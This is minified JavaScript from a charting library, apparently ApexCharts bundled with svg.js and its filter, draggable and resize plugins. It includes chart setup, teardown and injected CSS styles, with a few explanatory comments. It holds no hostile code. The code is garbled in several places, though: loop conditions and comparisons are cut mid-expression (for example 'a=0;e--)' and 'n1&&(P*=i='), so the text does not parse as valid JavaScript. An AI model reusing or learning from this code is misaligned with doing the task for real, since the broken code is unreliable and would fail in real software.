n.Set.prototype[a]&&e.push(a);for(var a in e.forEach((function(e){n.Set.prototype[e]=function(){for(var a=0,i=this.members.length;a=0;e--)delete this.memory()[arguments[e]];return this},memory:function(){return this._memory||(this._memory={})}}),n.get=function(e){var i=a.getElementById(function(e){var a=(e||"").toString().match(n.regex.reference);if(a)return a[1]}(e)||e);return n.adopt(i)},n.select=function(e,i){return new n.Set(n.utils.map((i||a).querySelectorAll(e),(function(e){return n.adopt(e)})))},n.extend(n.Parent,{select:function(e){return n.select(e,this.node)}});var k="abcdef".split("");if("function"!=typeof e.CustomEvent){var y=function(e,n){n=n||{bubbles:!1,cancelable:!1,detail:void 0};var i=a.createEvent("CustomEvent");return i.initCustomEvent(e,n.bubbles,n.cancelable,n.detail),i};y.prototype=e.Event.prototype,n.CustomEvent=y}else n.CustomEvent=e.CustomEvent;return n},void 0!==(i=function(){return 
Ee(Ne,Ne.document)}.call(a,n,a,e))&&(e.exports=i),function(){SVG.Filter=SVG.invent({create:"filter",inherit:SVG.Parent,extend:{source:"SourceGraphic",sourceAlpha:"SourceAlpha",background:"BackgroundImage",backgroundAlpha:"BackgroundAlpha",fill:"FillPaint",stroke:"StrokePaint",autoSetIn:!0,put:function(e,a){return this.add(e,a),!e.attr("in")&&this.autoSetIn&&e.attr("in",this.source),e.attr("result")||e.attr("result",e),e},blend:function(e,a,n){return this.put(new SVG.BlendEffect(e,a,n))},colorMatrix:function(e,a){return this.put(new SVG.ColorMatrixEffect(e,a))},convolveMatrix:function(e){return this.put(new SVG.ConvolveMatrixEffect(e))},componentTransfer:function(e){return this.put(new SVG.ComponentTransferEffect(e))},composite:function(e,a,n){return this.put(new SVG.CompositeEffect(e,a,n))},flood:function(e,a){return this.put(new SVG.FloodEffect(e,a))},offset:function(e,a){return this.put(new SVG.OffsetEffect(e,a))},image:function(e){return this.put(new SVG.ImageEffect(e))},merge:function(){var e=[void 0];for(var a in arguments)e.push(arguments[a]);return this.put(new(SVG.MergeEffect.bind.apply(SVG.MergeEffect,e)))},gaussianBlur:function(e,a){return this.put(new SVG.GaussianBlurEffect(e,a))},morphology:function(e,a){return this.put(new SVG.MorphologyEffect(e,a))},diffuseLighting:function(e,a,n){return this.put(new SVG.DiffuseLightingEffect(e,a,n))},displacementMap:function(e,a,n,i,t){return this.put(new SVG.DisplacementMapEffect(e,a,n,i,t))},specularLighting:function(e,a,n,i){return this.put(new SVG.SpecularLightingEffect(e,a,n,i))},tile:function(){return this.put(new SVG.TileEffect)},turbulence:function(e,a,n,i,t){return this.put(new SVG.TurbulenceEffect(e,a,n,i,t))},toString:function(){return"url(#"+this.attr("id")+")"}}}),SVG.extend(SVG.Defs,{filter:function(e){var a=this.put(new SVG.Filter);return"function"==typeof e&&e.call(a,a),a}}),SVG.extend(SVG.Container,{filter:function(e){return this.defs().filter(e)}}),SVG.extend(SVG.Element,SVG.G,SVG.Nested,{filter:function(e){return this.filterer=e instanceof SVG.Element?e:this.doc().filter(e),this.doc()&&this.filterer.doc()!==this.doc()&&this.doc().defs().add(this.filterer),this.attr("filter",this.filterer),this.filterer},unfilter:function(e){return this.filterer&&!0===e&&this.filterer.remove(),delete this.filterer,this.attr("filter",null)}}),SVG.Effect=SVG.invent({create:function(){this.constructor.call(this)},inherit:SVG.Element,extend:{in:function(e){return null==e?this.parent()&&this.parent().select('[result="'+this.attr("in")+'"]').get(0)||this.attr("in"):this.attr("in",e)},result:function(e){return null==e?this.attr("result"):this.attr("result",e)},toString:function(){return this.result()}}}),SVG.ParentEffect=SVG.invent({create:function(){this.constructor.call(this)},inherit:SVG.Parent,extend:{in:function(e){return null==e?this.parent()&&this.parent().select('[result="'+this.attr("in")+'"]').get(0)||this.attr("in"):this.attr("in",e)},result:function(e){return null==e?this.attr("result"):this.attr("result",e)},toString:function(){return this.result()}}});var e={blend:function(e,a){return this.parent()&&this.parent().blend(this,e,a)},colorMatrix:function(e,a){return this.parent()&&this.parent().colorMatrix(e,a).in(this)},convolveMatrix:function(e){return this.parent()&&this.parent().convolveMatrix(e).in(this)},componentTransfer:function(e){return this.parent()&&this.parent().componentTransfer(e).in(this)},composite:function(e,a){return this.parent()&&this.parent().composite(this,e,a)},flood:function(e,a){return 
this.parent()&&this.parent().flood(e,a)},offset:function(e,a){return this.parent()&&this.parent().offset(e,a).in(this)},image:function(e){return this.parent()&&this.parent().image(e)},merge:function(){return this.parent()&&this.parent().merge.apply(this.parent(),[this].concat(arguments))},gaussianBlur:function(e,a){return this.parent()&&this.parent().gaussianBlur(e,a).in(this)},morphology:function(e,a){return this.parent()&&this.parent().morphology(e,a).in(this)},diffuseLighting:function(e,a,n){return this.parent()&&this.parent().diffuseLighting(e,a,n).in(this)},displacementMap:function(e,a,n,i){return this.parent()&&this.parent().displacementMap(this,e,a,n,i)},specularLighting:function(e,a,n,i){return this.parent()&&this.parent().specularLighting(e,a,n,i).in(this)},tile:function(){return this.parent()&&this.parent().tile().in(this)},turbulence:function(e,a,n,i,t){return this.parent()&&this.parent().turbulence(e,a,n,i,t).in(this)}};SVG.extend(SVG.Effect,e),SVG.extend(SVG.ParentEffect,e),SVG.ChildEffect=SVG.invent({create:function(){this.constructor.call(this)},inherit:SVG.Element,extend:{in:function(e){this.attr("in",e)}}});var a={blend:function(e,a,n){this.attr({in:e,in2:a,mode:n||"normal"})},colorMatrix:function(e,a){"matrix"==e&&(a=t(a)),this.attr({type:e,values:void 0===a?null:a})},convolveMatrix:function(e){e=t(e),this.attr({order:Math.sqrt(e.split(" ").length),kernelMatrix:e})},composite:function(e,a,n){this.attr({in:e,in2:a,operator:n})},flood:function(e,a){this.attr("flood-color",e),null!=a&&this.attr("flood-opacity",a)},offset:function(e,a){this.attr({dx:e,dy:a})},image:function(e){this.attr("href",e,SVG.xlink)},displacementMap:function(e,a,n,i,t){this.attr({in:e,in2:a,scale:n,xChannelSelector:i,yChannelSelector:t})},gaussianBlur:function(e,a){null!=e||null!=a?this.attr("stdDeviation",r(Array.prototype.slice.call(arguments))):this.attr("stdDeviation","0 0")},morphology:function(e,a){this.attr({operator:e,radius:a})},tile:function(){},turbulence:function(e,a,n,i,t){this.attr({numOctaves:a,seed:n,stitchTiles:i,baseFrequency:e,type:t})}},n={merge:function(){var e;if(arguments[0]instanceof SVG.Set){var a=this;arguments[0].each((function(e){this instanceof SVG.MergeNode?a.put(this):(this instanceof SVG.Effect||this instanceof SVG.ParentEffect)&&a.put(new SVG.MergeNode(this))}))}else{e=Array.isArray(arguments[0])?arguments[0]:arguments;for(var n=0;n1&&(P*=i=Math.sqrt(i),B*=i),t=(new SVG.Matrix).rotate(T).scale(1/P,1/B).rotate(-T),R=R.transform(t),s=(r=[(K=K.transform(t)).x-R.x,K.y-R.y])[0]*r[0]+r[1]*r[1],o=Math.sqrt(s),r[0]/=o,r[1]/=o,l=s<4?Math.sqrt(1-s/4):0,L===z&&(l*=-1),u=new SVG.Point((K.x+R.x)/2+l*-r[1],(K.y+R.y)/2+l*r[0]),c=new SVG.Point(R.x-u.x,R.y-u.y),d=new SVG.Point(K.x-u.x,K.y-u.y),h=Math.acos(c.x/Math.sqrt(c.x*c.x+c.y*c.y)),c.y<0&&(h*=-1),p=Math.acos(d.x/Math.sqrt(d.x*d.x+d.y*d.y)),d.y<0&&(p*=-1),z&&h>p&&(p+=2*Math.PI),!z&&hr.maxX-a.width&&(o=(i=r.maxX-a.width)-this.startPoints.box.x),null!=r.minY&&tr.maxY-a.height&&(s=(t=r.maxY-a.height)-this.startPoints.box.y),null!=r.snapToGrid&&(i-=i%r.snapToGrid,t-=t%r.snapToGrid,o-=o%r.snapToGrid,s-=s%r.snapToGrid),this.el instanceof SVG.G?this.el.matrix(this.startPoints.transform).transform({x:o,y:s},!0):this.el.move(i,t));return n},e.prototype.end=function(e){var a=this.drag(e);this.el.fire("dragend",{event:e,p:a,m:this.m,handler:this}),SVG.off(window,"mousemove.drag"),SVG.off(window,"touchmove.drag"),SVG.off(window,"mouseup.drag"),SVG.off(window,"touchend.drag")},SVG.extend(SVG.Element,{draggable:function(a,n){"function"!=typeof 
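/*
 * The svg.draggable plugin continuing below converts pointer coordinates into
 * the element's local space via screenCTM().inverse(), clamps the move against
 * an optional constraint box, snaps it to an optional grid, and fires
 * dragstart/dragmove/dragend (the '.drag'-namespaced window listeners are
 * removed again on end). Grid snapping is plain modulo arithmetic:
 *
 *   function snap(v, grid) { return v - v % grid; }  // snap(37, 10) === 30
 */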
a&&"object"!=typeof a||(n=a,a=!0);var i=this.remember("_draggable")||new e(this);return(a=void 0===a||a)?i.init(n||{},a):(this.off("mousedown.drag"),this.off("touchstart.drag")),this}})}.call(void 0),function(){function e(e){this.el=e,e.remember("_selectHandler",this),this.pointSelection={isSelected:!1},this.rectSelection={isSelected:!1},this.pointsList={lt:[0,0],rt:["width",0],rb:["width","height"],lb:[0,"height"],t:["width",0],r:["width","height"],b:["width","height"],l:[0,"height"]},this.pointCoord=function(e,a,n){var i="string"!=typeof e?e:a[e];return n?i/2:i},this.pointCoords=function(e,a){var n=this.pointsList[e];return{x:this.pointCoord(n[0],a,"t"===e||"b"===e),y:this.pointCoord(n[1],a,"r"===e||"l"===e)}}}e.prototype.init=function(e,a){var n=this.el.bbox();this.options={};var i=this.el.selectize.defaults.points;for(var t in this.el.selectize.defaults)this.options[t]=this.el.selectize.defaults[t],void 0!==a[t]&&(this.options[t]=a[t]);var r=["points","pointsExclude"];for(var t in r){var o=this.options[r[t]];"string"==typeof o?o=o.length>0?o.split(/\s*,\s*/i):[]:"boolean"==typeof o&&"points"===r[t]&&(o=o?i:[]),this.options[r[t]]=o}this.options.points=[i,this.options.points].reduce((function(e,a){return e.filter((function(e){return a.indexOf(e)>-1}))})),this.options.points=[this.options.points,this.options.pointsExclude].reduce((function(e,a){return e.filter((function(e){return a.indexOf(e)<0}))})),this.parent=this.el.parent(),this.nested=this.nested||this.parent.group(),this.nested.matrix(new SVG.Matrix(this.el).translate(n.x,n.y)),this.options.deepSelect&&-1!==["line","polyline","polygon"].indexOf(this.el.type)?this.selectPoints(e):this.selectRect(e),this.observe(),this.cleanup()},e.prototype.selectPoints=function(e){return this.pointSelection.isSelected=e,this.pointSelection.set||(this.pointSelection.set=this.parent.set(),this.drawPoints()),this},e.prototype.getPointArray=function(){var e=this.el.bbox();return this.el.array().valueOf().map((function(a){return[a[0]-e.x,a[1]-e.y]}))},e.prototype.drawPoints=function(){for(var e=this,a=this.getPointArray(),n=0,i=a.length;n0&&this.parameters.box.height-n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x+n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize-n[0]);n=this.checkAspectRatio(n),this.el.move(this.parameters.box.x+n[0],this.parameters.box.y+n[1]).size(this.parameters.box.width-n[0],this.parameters.box.height-n[1])}};break;case"rt":this.calc=function(e,a){var n=this.snapToGrid(e,a,2);if(this.parameters.box.width+n[0]>0&&this.parameters.box.height-n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x-n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize+n[0]);n=this.checkAspectRatio(n,!0),this.el.move(this.parameters.box.x,this.parameters.box.y+n[1]).size(this.parameters.box.width+n[0],this.parameters.box.height-n[1])}};break;case"rb":this.calc=function(e,a){var n=this.snapToGrid(e,a,0);if(this.parameters.box.width+n[0]>0&&this.parameters.box.height+n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x-n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize+n[0]);n=this.checkAspectRatio(n),this.el.move(this.parameters.box.x,this.parameters.box.y).size(this.parameters.box.width+n[0],this.parameters.box.height+n[1])}};break;case"lb":this.calc=function(e,a){var 
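/*
 * Each resize handle in the surrounding switch ('lt', 'rt', 'rb', 'lb', 't',
 * 'r', 'b', 'l', 'rot', 'point') installs a calc(dx, dy) closure over the box
 * captured at resizestart; the third snapToGrid argument is a 2-bit mask
 * choosing which edges anchor the snap (bit 1: the left edge is moving,
 * bit 2: the top edge is moving). The left-bottom handle, for example, resizes as:
 *
 *   el.move(box.x + dx, box.y).size(box.width - dx, box.height + dy);
 */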
n=this.snapToGrid(e,a,1);if(this.parameters.box.width-n[0]>0&&this.parameters.box.height+n[1]>0){if("text"===this.parameters.type)return this.el.move(this.parameters.box.x+n[0],this.parameters.box.y),void this.el.attr("font-size",this.parameters.fontSize-n[0]);n=this.checkAspectRatio(n,!0),this.el.move(this.parameters.box.x+n[0],this.parameters.box.y).size(this.parameters.box.width-n[0],this.parameters.box.height+n[1])}};break;case"t":this.calc=function(e,a){var n=this.snapToGrid(e,a,2);if(this.parameters.box.height-n[1]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x,this.parameters.box.y+n[1]).height(this.parameters.box.height-n[1])}};break;case"r":this.calc=function(e,a){var n=this.snapToGrid(e,a,0);if(this.parameters.box.width+n[0]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x,this.parameters.box.y).width(this.parameters.box.width+n[0])}};break;case"b":this.calc=function(e,a){var n=this.snapToGrid(e,a,0);if(this.parameters.box.height+n[1]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x,this.parameters.box.y).height(this.parameters.box.height+n[1])}};break;case"l":this.calc=function(e,a){var n=this.snapToGrid(e,a,1);if(this.parameters.box.width-n[0]>0){if("text"===this.parameters.type)return;this.el.move(this.parameters.box.x+n[0],this.parameters.box.y).width(this.parameters.box.width-n[0])}};break;case"rot":this.calc=function(e,a){var n=e+this.parameters.p.x,i=a+this.parameters.p.y,t=Math.atan2(this.parameters.p.y-this.parameters.box.y-this.parameters.box.height/2,this.parameters.p.x-this.parameters.box.x-this.parameters.box.width/2),r=Math.atan2(i-this.parameters.box.y-this.parameters.box.height/2,n-this.parameters.box.x-this.parameters.box.width/2),o=this.parameters.rotation+180*(r-t)/Math.PI+this.options.snapToAngle/2;this.el.center(this.parameters.box.cx,this.parameters.box.cy).rotate(o-o%this.options.snapToAngle,this.parameters.box.cx,this.parameters.box.cy)};break;case"point":this.calc=function(e,a){var n=this.snapToGrid(e,a,this.parameters.pointCoords[0],this.parameters.pointCoords[1]),i=this.el.array().valueOf();i[this.parameters.i][0]=this.parameters.pointCoords[0]+n[0],i[this.parameters.i][1]=this.parameters.pointCoords[1]+n[1],this.el.plot(i)}}this.el.fire("resizestart",{dx:this.parameters.x,dy:this.parameters.y,event:e}),SVG.on(window,"touchmove.resize",(function(e){a.update(e||window.event)})),SVG.on(window,"touchend.resize",(function(){a.done()})),SVG.on(window,"mousemove.resize",(function(e){a.update(e||window.event)})),SVG.on(window,"mouseup.resize",(function(){a.done()}))},e.prototype.update=function(e){if(e){var a=this._extractPosition(e),n=this.transformPoint(a.x,a.y),i=n.x-this.parameters.p.x,t=n.y-this.parameters.p.y;this.lastUpdateCall=[i,t],this.calc(i,t),this.el.fire("resizing",{dx:i,dy:t,event:e})}else this.lastUpdateCall&&this.calc(this.lastUpdateCall[0],this.lastUpdateCall[1])},e.prototype.done=function(){this.lastUpdateCall=null,SVG.off(window,"mousemove.resize"),SVG.off(window,"mouseup.resize"),SVG.off(window,"touchmove.resize"),SVG.off(window,"touchend.resize"),this.el.fire("resizedone")},e.prototype.snapToGrid=function(e,a,n,i){var t;return void 
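/*
 * snapToGrid (resuming below) and checkAspectRatio post-process each resize
 * delta: the former rounds the moving edges onto the configured grid, the
 * latter (when saveAspectRatio is set) rewrites one component of [dx, dy] so
 * the resized box keeps its original width:height ratio. The ratio test,
 * sketched:
 *
 *   var ratio = box.width / box.height;
 *   var newRatio = (box.width + dx) / (box.height - dy);
 *   // if newRatio deviates from ratio, one of dx/dy is recomputed from the other
 */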
0!==i?t=[(n+e)%this.options.snapToGrid,(i+a)%this.options.snapToGrid]:(n=null==n?3:n,t=[(this.parameters.box.x+e+(1&n?0:this.parameters.box.width))%this.options.snapToGrid,(this.parameters.box.y+a+(2&n?0:this.parameters.box.height))%this.options.snapToGrid]),e<0&&(t[0]-=this.options.snapToGrid),a<0&&(t[1]-=this.options.snapToGrid),e-=Math.abs(t[0])o.maxX&&(e=o.maxX-t),void 0!==o.minY&&r+ao.maxY&&(a=o.maxY-r),[e,a]},e.prototype.checkAspectRatio=function(e,a){if(!this.options.saveAspectRatio)return e;var n=e.slice(),i=this.parameters.box.width/this.parameters.box.height,t=this.parameters.box.width+e[0],r=this.parameters.box.height-e[1],o=t/r;return oi&&(n[0]=this.parameters.box.width-r*i,a&&(n[0]=-n[0])),n},SVG.extend(SVG.Element,{resize:function(a){return(this.remember("_resizeHandler")||new e(this)).init(a||{}),this}}),SVG.Element.prototype.resize.defaults={snapToAngle:.1,snapToGrid:1,constraint:{},saveAspectRatio:!1}}).call(this)}(),void 0===window.Apex&&(window.Apex={});var He=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"initModules",value:function(){this.ctx.publicMethods=["updateOptions","updateSeries","appendData","appendSeries","toggleSeries","showSeries","hideSeries","setLocale","resetSeries","zoomX","toggleDataPointSelection","dataURI","addXaxisAnnotation","addYaxisAnnotation","addPointAnnotation","clearAnnotations","removeAnnotation","paper","destroy"],this.ctx.eventList=["click","mousedown","mousemove","mouseleave","touchstart","touchmove","touchleave","mouseup","touchend"],this.ctx.animations=new y(this.ctx),this.ctx.axes=new ne(this.ctx),this.ctx.core=new De(this.ctx.el,this.ctx),this.ctx.config=new F({}),this.ctx.data=new Z(this.ctx),this.ctx.grid=new Y(this.ctx),this.ctx.graphics=new S(this.ctx),this.ctx.coreUtils=new A(this.ctx),this.ctx.crosshairs=new ie(this.ctx),this.ctx.events=new ee(this.ctx),this.ctx.exports=new U(this.ctx),this.ctx.localization=new ae(this.ctx),this.ctx.options=new B,this.ctx.responsive=new te(this.ctx),this.ctx.series=new K(this.ctx),this.ctx.theme=new re(this.ctx),this.ctx.formatters=new J(this.ctx),this.ctx.titleSubtitle=new oe(this.ctx),this.ctx.legend=new pe(this.ctx),this.ctx.toolbar=new me(this.ctx),this.ctx.dimensions=new de(this.ctx),this.ctx.updateHelpers=new _e(this.ctx),this.ctx.zoomPanSelection=new fe(this.ctx),this.ctx.w.globals.tooltip=new Se(this.ctx)}}]),e}(),Oe=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"clear",value:function(e){var a=e.isUpdating;this.ctx.zoomPanSelection&&this.ctx.zoomPanSelection.destroy(),this.ctx.toolbar&&this.ctx.toolbar.destroy(),this.ctx.animations=null,this.ctx.axes=null,this.ctx.annotations=null,this.ctx.core=null,this.ctx.data=null,this.ctx.grid=null,this.ctx.series=null,this.ctx.responsive=null,this.ctx.theme=null,this.ctx.formatters=null,this.ctx.titleSubtitle=null,this.ctx.legend=null,this.ctx.dimensions=null,this.ctx.options=null,this.ctx.crosshairs=null,this.ctx.zoomPanSelection=null,this.ctx.updateHelpers=null,this.ctx.toolbar=null,this.ctx.localization=null,this.ctx.w.globals.tooltip=null,this.clearDomElements({isUpdating:a})}},{key:"killSVG",value:function(e){e.each((function(e,a){this.removeClass("*"),this.off(),this.stop()}),!0),e.ungroup(),e.clear()}},{key:"clearDomElements",value:function(e){var a=this,n=e.isUpdating,i=this.w.globals.dom.Paper.node;i.parentNode&&i.parentNode.parentNode&&!n&&(i.parentNode.parentNode.style.minHeight="unset");var 
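/*
 * Teardown, continued below: destroy() walks every SVG node to unbind events
 * and stop running animations (killSVG), removes the DOM listeners that were
 * registered from eventList, and nulls the module references so the chart
 * instance can be garbage-collected. The listener cleanup mirrors setup
 * (the handler name here is assumed for illustration):
 *
 *   eventList.forEach(function (name) {
 *     baseEl.removeEventListener(name, documentEventHandler);
 *   });
 */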
t=this.w.globals.dom.baseEl;t&&this.ctx.eventList.forEach((function(e){t.removeEventListener(e,a.ctx.events.documentEvent)}));var r=this.w.globals.dom;if(null!==this.ctx.el)for(;this.ctx.el.firstChild;)this.ctx.el.removeChild(this.ctx.el.firstChild);this.killSVG(r.Paper),r.Paper.remove(),r.elWrap=null,r.elGraphical=null,r.elAnnotations=null,r.elLegendWrap=null,r.baseEl=null,r.elGridRect=null,r.elGridRectMask=null,r.elGridRectMarkerMask=null,r.elForecastMask=null,r.elNonForecastMask=null,r.elDefs=null}}]),e}(),Ve=new WeakMap,Fe=function(){function e(a,n){s(this,e),this.opts=n,this.ctx=this,this.w=new I(n).init(),this.el=a,this.w.globals.cuid=k.randomId(),this.w.globals.chartID=this.w.config.chart.id?k.escapeString(this.w.config.chart.id):this.w.globals.cuid,new He(this).initModules(),this.create=k.bind(this.create,this),this.windowResizeHandler=this._windowResizeHandler.bind(this),this.parentResizeHandler=this._parentResizeCallback.bind(this)}return u(e,[{key:"render",value:function(){var e=this;return new Promise((function(a,n){if(null!==e.el){void 0===Apex._chartInstances&&(Apex._chartInstances=[]),e.w.config.chart.id&&Apex._chartInstances.push({id:e.w.globals.chartID,group:e.w.config.chart.group,chart:e}),e.setLocale(e.w.config.chart.defaultLocale);var i=e.w.config.chart.events.beforeMount;if("function"==typeof i&&i(e,e.w),e.events.fireEvent("beforeMount",[e,e.w]),window.addEventListener("resize",e.windowResizeHandler),function(e,a){var n=!1,i=e.getBoundingClientRect();"none"!==e.style.display&&0!==i.width||(n=!0);var t=new ResizeObserver((function(i){n&&a.call(e,i),n=!0}));e.nodeType===Node.DOCUMENT_FRAGMENT_NODE?Array.from(e.children).forEach((function(e){return t.observe(e)})):t.observe(e),Ve.set(a,t)}(e.el.parentNode,e.parentResizeHandler),!e.css){var t=e.el.getRootNode&&e.el.getRootNode(),r=k.is("ShadowRoot",t),o=e.el.ownerDocument,s=o.getElementById("apexcharts-css");!r&&s||(e.css=document.createElement("style"),e.css.id="apexcharts-css",e.css.textContent='.apexcharts-canvas {\n position: relative;\n user-select: none;\n /* cannot give overflow: hidden as it will crop tooltips which overflow outside chart area */\n}\n\n\n/* scrollbar is not visible by default for legend, hence forcing the visibility */\n.apexcharts-canvas ::-webkit-scrollbar {\n -webkit-appearance: none;\n width: 6px;\n}\n\n.apexcharts-canvas ::-webkit-scrollbar-thumb {\n border-radius: 4px;\n background-color: rgba(0, 0, 0, .5);\n box-shadow: 0 0 1px rgba(255, 255, 255, .5);\n -webkit-box-shadow: 0 0 1px rgba(255, 255, 255, .5);\n}\n\n\n.apexcharts-inner {\n position: relative;\n}\n\n.apexcharts-text tspan {\n font-family: inherit;\n}\n\n.legend-mouseover-inactive {\n transition: 0.15s ease all;\n opacity: 0.20;\n}\n\n.apexcharts-series-collapsed {\n opacity: 0;\n}\n\n.apexcharts-tooltip {\n border-radius: 5px;\n box-shadow: 2px 2px 6px -4px #999;\n cursor: default;\n font-size: 14px;\n left: 62px;\n opacity: 0;\n pointer-events: none;\n position: absolute;\n top: 20px;\n display: flex;\n flex-direction: column;\n overflow: hidden;\n white-space: nowrap;\n z-index: 12;\n transition: 0.15s ease all;\n}\n\n.apexcharts-tooltip.apexcharts-active {\n opacity: 1;\n transition: 0.15s ease all;\n}\n\n.apexcharts-tooltip.apexcharts-theme-light {\n border: 1px solid #e3e3e3;\n background: rgba(255, 255, 255, 0.96);\n}\n\n.apexcharts-tooltip.apexcharts-theme-dark {\n color: #fff;\n background: rgba(30, 30, 30, 0.8);\n}\n\n.apexcharts-tooltip * {\n font-family: inherit;\n}\n\n\n.apexcharts-tooltip-title {\n padding: 6px;\n 
font-size: 15px;\n margin-bottom: 4px;\n}\n\n.apexcharts-tooltip.apexcharts-theme-light .apexcharts-tooltip-title {\n background: #ECEFF1;\n border-bottom: 1px solid #ddd;\n}\n\n.apexcharts-tooltip.apexcharts-theme-dark .apexcharts-tooltip-title {\n background: rgba(0, 0, 0, 0.7);\n border-bottom: 1px solid #333;\n}\n\n.apexcharts-tooltip-text-y-value,\n.apexcharts-tooltip-text-goals-value,\n.apexcharts-tooltip-text-z-value {\n display: inline-block;\n font-weight: 600;\n margin-left: 5px;\n}\n\n.apexcharts-tooltip-title:empty,\n.apexcharts-tooltip-text-y-label:empty,\n.apexcharts-tooltip-text-y-value:empty,\n.apexcharts-tooltip-text-goals-label:empty,\n.apexcharts-tooltip-text-goals-value:empty,\n.apexcharts-tooltip-text-z-value:empty {\n display: none;\n}\n\n.apexcharts-tooltip-text-y-value,\n.apexcharts-tooltip-text-goals-value,\n.apexcharts-tooltip-text-z-value {\n font-weight: 600;\n}\n\n.apexcharts-tooltip-text-goals-label, \n.apexcharts-tooltip-text-goals-value {\n padding: 6px 0 5px;\n}\n\n.apexcharts-tooltip-goals-group, \n.apexcharts-tooltip-text-goals-label, \n.apexcharts-tooltip-text-goals-value {\n display: flex;\n}\n.apexcharts-tooltip-text-goals-label:not(:empty),\n.apexcharts-tooltip-text-goals-value:not(:empty) {\n margin-top: -6px;\n}\n\n.apexcharts-tooltip-marker {\n width: 12px;\n height: 12px;\n position: relative;\n top: 0px;\n margin-right: 10px;\n border-radius: 50%;\n}\n\n.apexcharts-tooltip-series-group {\n padding: 0 10px;\n display: none;\n text-align: left;\n justify-content: left;\n align-items: center;\n}\n\n.apexcharts-tooltip-series-group.apexcharts-active .apexcharts-tooltip-marker {\n opacity: 1;\n}\n\n.apexcharts-tooltip-series-group.apexcharts-active,\n.apexcharts-tooltip-series-group:last-child {\n padding-bottom: 4px;\n}\n\n.apexcharts-tooltip-series-group-hidden {\n opacity: 0;\n height: 0;\n line-height: 0;\n padding: 0 !important;\n}\n\n.apexcharts-tooltip-y-group {\n padding: 6px 0 5px;\n}\n\n.apexcharts-tooltip-box, .apexcharts-custom-tooltip {\n padding: 4px 8px;\n}\n\n.apexcharts-tooltip-boxPlot {\n display: flex;\n flex-direction: column-reverse;\n}\n\n.apexcharts-tooltip-box>div {\n margin: 4px 0;\n}\n\n.apexcharts-tooltip-box span.value {\n font-weight: bold;\n}\n\n.apexcharts-tooltip-rangebar {\n padding: 5px 8px;\n}\n\n.apexcharts-tooltip-rangebar .category {\n font-weight: 600;\n color: #777;\n}\n\n.apexcharts-tooltip-rangebar .series-name {\n font-weight: bold;\n display: block;\n margin-bottom: 5px;\n}\n\n.apexcharts-xaxistooltip {\n opacity: 0;\n padding: 9px 10px;\n pointer-events: none;\n color: #373d3f;\n font-size: 13px;\n text-align: center;\n border-radius: 2px;\n position: absolute;\n z-index: 10;\n background: #ECEFF1;\n border: 1px solid #90A4AE;\n transition: 0.15s ease all;\n}\n\n.apexcharts-xaxistooltip.apexcharts-theme-dark {\n background: rgba(0, 0, 0, 0.7);\n border: 1px solid rgba(0, 0, 0, 0.5);\n color: #fff;\n}\n\n.apexcharts-xaxistooltip:after,\n.apexcharts-xaxistooltip:before {\n left: 50%;\n border: solid transparent;\n content: " ";\n height: 0;\n width: 0;\n position: absolute;\n pointer-events: none;\n}\n\n.apexcharts-xaxistooltip:after {\n border-color: rgba(236, 239, 241, 0);\n border-width: 6px;\n margin-left: -6px;\n}\n\n.apexcharts-xaxistooltip:before {\n border-color: rgba(144, 164, 174, 0);\n border-width: 7px;\n margin-left: -7px;\n}\n\n.apexcharts-xaxistooltip-bottom:after,\n.apexcharts-xaxistooltip-bottom:before {\n bottom: 
100%;\n}\n\n.apexcharts-xaxistooltip-top:after,\n.apexcharts-xaxistooltip-top:before {\n top: 100%;\n}\n\n.apexcharts-xaxistooltip-bottom:after {\n border-bottom-color: #ECEFF1;\n}\n\n.apexcharts-xaxistooltip-bottom:before {\n border-bottom-color: #90A4AE;\n}\n\n.apexcharts-xaxistooltip-bottom.apexcharts-theme-dark:after {\n border-bottom-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip-bottom.apexcharts-theme-dark:before {\n border-bottom-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip-top:after {\n border-top-color: #ECEFF1\n}\n\n.apexcharts-xaxistooltip-top:before {\n border-top-color: #90A4AE;\n}\n\n.apexcharts-xaxistooltip-top.apexcharts-theme-dark:after {\n border-top-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip-top.apexcharts-theme-dark:before {\n border-top-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-xaxistooltip.apexcharts-active {\n opacity: 1;\n transition: 0.15s ease all;\n}\n\n.apexcharts-yaxistooltip {\n opacity: 0;\n padding: 4px 10px;\n pointer-events: none;\n color: #373d3f;\n font-size: 13px;\n text-align: center;\n border-radius: 2px;\n position: absolute;\n z-index: 10;\n background: #ECEFF1;\n border: 1px solid #90A4AE;\n}\n\n.apexcharts-yaxistooltip.apexcharts-theme-dark {\n background: rgba(0, 0, 0, 0.7);\n border: 1px solid rgba(0, 0, 0, 0.5);\n color: #fff;\n}\n\n.apexcharts-yaxistooltip:after,\n.apexcharts-yaxistooltip:before {\n top: 50%;\n border: solid transparent;\n content: " ";\n height: 0;\n width: 0;\n position: absolute;\n pointer-events: none;\n}\n\n.apexcharts-yaxistooltip:after {\n border-color: rgba(236, 239, 241, 0);\n border-width: 6px;\n margin-top: -6px;\n}\n\n.apexcharts-yaxistooltip:before {\n border-color: rgba(144, 164, 174, 0);\n border-width: 7px;\n margin-top: -7px;\n}\n\n.apexcharts-yaxistooltip-left:after,\n.apexcharts-yaxistooltip-left:before {\n left: 100%;\n}\n\n.apexcharts-yaxistooltip-right:after,\n.apexcharts-yaxistooltip-right:before {\n right: 100%;\n}\n\n.apexcharts-yaxistooltip-left:after {\n border-left-color: #ECEFF1;\n}\n\n.apexcharts-yaxistooltip-left:before {\n border-left-color: #90A4AE;\n}\n\n.apexcharts-yaxistooltip-left.apexcharts-theme-dark:after {\n border-left-color: rgba(0, 0, 0, 0.5);\n}\n\n.apexcharts-yaxistooltip-left.apexcharts-theme-dark:before {\n border-left-color: rgba(0, 0, 0, 